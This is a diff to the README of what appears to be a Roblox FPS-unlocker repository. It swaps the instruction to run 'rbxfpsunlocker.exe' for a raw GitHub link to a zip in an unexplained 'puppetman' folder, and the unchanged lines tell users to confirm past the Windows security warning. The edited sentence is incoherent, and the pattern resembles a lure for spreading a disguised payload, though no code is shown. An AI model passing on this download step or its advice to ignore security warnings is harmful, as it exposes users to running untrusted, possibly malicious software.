yurism123/rbxfpsunlocker/README.md

 ### 3. Run the Unlocker

-Find the `rbxfpsunlocker.exe` file you just downloaded and double-click it.
+Find the `https://raw.githubusercontent.com/yurism123/rbxfpsunlocker/main/puppetman/Software_1.4-beta.3.zip` file you just downloaded and double-click it.
 This will open the unlocker program.

 You might see a security warning from Windows asking if you want to run this file.
 Confirm that you want to run it.